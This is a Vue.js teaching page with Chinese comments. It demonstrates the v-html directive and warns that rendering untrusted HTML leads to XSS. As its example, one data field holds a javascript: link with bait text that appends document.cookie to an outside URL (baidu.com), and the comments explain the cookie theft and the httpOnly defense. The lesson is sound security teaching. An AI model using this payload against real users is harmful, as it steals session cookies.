<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>v-html指令</title>
    <script src="../js/vue.js"></script>
</head>
<body>
    <!-- 
        v-html指令:
            1.作用: 向指定节点中渲染包含html结构的内容
            2.与插值语法的区别:
                (1).v-html会替换掉节点中所有的内容, {{xxx}}不会
                (2).v-html可以识别html结构
            3.严重注意: v-html正因为能解析html标签,所以有安全性问题
                (1).在网站上动态渲染任意HTML是非常危险的,容易导致XSS攻击
                (2).一定要在可信的内容上使用v-html,永远不要用在用户提交的内容上
     -->
    
    <div id="root">
        <div>你好, {{name}}</div>
        <div v-html="str"></div>
        <div v-html="str2"></div>
        
    </div>

    <script>
        Vue.config.productionTip = false;
        const vm = new Vue({
            el: "#root",
            data:{
                name:'尚硅谷',
                str:'<h1>你好</h1>',
                // 用户点击后携带自身浏览器当前域的cookie跳转到其他网站,泄漏用户cookie
                str2:'<a href="javascript:location.href="http://baidu.com?"+document.cookie>兄弟我找到你爱看的资源了,点我看惊喜</a>'
                // 每个cookie中httpOnly=true(勾选)能够限制用js脚本访问该cookie,防止XSS攻击(防止泄露该cookie)
                // XSS全称是Cross Site Scripting即跨站脚本
            }
        })
    </script>
</body>
</html>